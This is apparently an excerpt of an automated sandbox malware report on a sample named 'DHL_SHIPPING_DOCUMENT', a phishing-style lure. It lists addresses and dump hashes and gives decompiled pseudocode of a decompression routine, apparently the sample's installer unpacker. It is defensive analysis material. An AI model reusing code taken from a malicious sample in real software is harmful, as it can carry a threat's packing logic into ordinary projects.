                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0c
                                                              0x00406e0f
                                                              0x00406e15
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e1a
                                                              0x00406e1d
                                                              0x00406e1d
                                                              0x00406e20
                                                              0x00406e23
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e29
                                                              0x00406e2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e35
                                                              0x00406e35
                                                              0x00406e39
                                                              0x00406e3c
                                                              0x00406e3f
                                                              0x00406e42
                                                              0x00406e45
                                                              0x00406e46
                                                              0x00406e49
                                                              0x00406e4b
                                                              0x00406e51
                                                              0x00406e54
                                                              0x00406e57
                                                              0x00406e5a
                                                              0x00406e5d
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e7f
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8f
                                                              0x00406e93
                                                              0x00406e95
                                                              0x00406e99
                                                              0x00406e65
                                                              0x00406e65
                                                              0x00406e69
                                                              0x00406e71
                                                              0x00406e76
                                                              0x00406e78
                                                              0x00406e7a
                                                              0x00406e7a
                                                              0x00406e9c
                                                              0x00406ea3
                                                              0x00406ea6
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406eb5
                                                              0x00407575
                                                              0x00000000
                                                              0x00407575
                                                              0x00406ebb
                                                              0x00406ebe
                                                              0x00406ec1
                                                              0x00406ec5
                                                              0x00406ec8
                                                              0x00406ece
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed3
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406edc
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ede
                                                              0x00406ee1
                                                              0x00406ee4
                                                              0x00406ee7
                                                              0x00406eea
                                                              0x00406eed
                                                              0x00406ef0
                                                              0x00406ef3
                                                              0x00406ef6
                                                              0x00406ef9
                                                              0x00406efc
                                                              0x00406f14
                                                              0x00406f17
                                                              0x00406f1a
                                                              0x00406f1d
                                                              0x00406f1d
                                                              0x00406f20
                                                              0x00406f24
                                                              0x00406f26
                                                              0x00406efe
                                                              0x00406efe
                                                              0x00406f06
                                                              0x00406f0b
                                                              0x00406f0d
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f29
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00000000
                                                              0x00406f35
                                                              0x00000000
                                                              0x00406f35
                                                              0x00406f33
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f75
                                                              0x00406f75
                                                              0x00406f79
                                                              0x00407581
                                                              0x00000000
                                                              0x00407581
                                                              0x00406f7f
                                                              0x00406f82
                                                              0x00406f85
                                                              0x00406f89
                                                              0x00406f8c
                                                              0x00406f92
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f97
                                                              0x00406f9a
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406f3e
                                                              0x00406f3e
                                                              0x00406f41
                                                              0x00000000
                                                              0x00406f41
                                                              0x00406fa2
                                                              0x00406fa2
                                                              0x00406fa5
                                                              0x00406fa8
                                                              0x00406fab
                                                              0x00406fae
                                                              0x00406fb1
                                                              0x00406fb4
                                                              0x00406fb7
                                                              0x00406fba
                                                              0x00406fbd
                                                              0x00406fc0
                                                              0x00406fd8
                                                              0x00406fdb
                                                              0x00406fde
                                                              0x00406fe1
                                                              0x00406fe1
                                                              0x00406fe4
                                                              0x00406fe8
                                                              0x00406fea
                                                              0x00406fc2
                                                              0x00406fc2
                                                              0x00406fca
                                                              0x00406fcf
                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406fed
                                                              0x00406ff4
                                                              0x00406ff7
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00000000
                                                              0x00000000
                                                              0x00407395
                                                              0x00407399
                                                              0x004073bb
                                                              0x004073be
                                                              0x004073c8
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a5
                                                              0x004073a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00407489
                                                              0x00407489
                                                              0x00000000
                                                              0x00407489
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407546
                                                              0x00000000
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407194
                                                              0x00407197
                                                              0x0040719a
                                                              0x0040719c
                                                              0x0040719e
                                                              0x0040719e
                                                              0x0040719f
                                                              0x004071a2
                                                              0x004071a9
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c7
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x00407447
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074eb
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x0040751d
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x0040738e
                                                              0x004075c3
                                                              0x004075e5
                                                              0x004075eb
                                                              0x004075ed
                                                              0x004075f4
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                              • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                              • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                              • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
